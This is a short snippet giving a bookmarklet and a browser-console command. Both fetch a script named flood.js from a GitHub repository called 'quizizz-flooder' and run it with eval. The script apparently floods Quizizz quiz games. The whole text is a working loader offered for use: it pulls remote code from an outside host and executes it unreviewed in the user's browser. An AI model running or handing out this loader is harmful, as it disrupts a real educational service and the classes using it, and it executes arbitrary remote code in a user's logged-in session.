Bookmarklet
javascript:(function()%7Bfetch(%22https%3A%2F%2Fraw.githubusercontent.com%2Fseanv999%2Fquizizz-flooder%2Fmain%2Fflood.js%22)%0A.then((res)%20%3D%3E%20res.text()%0A.then((t)%20%3D%3E%20eval(t)))%7D)()%3B
Console
fetch("https://raw.githubusercontent.com/seanv999/quizizz-flooder/main/flood.js")
.then((res) => res.text()
.then((t) => eval(t)))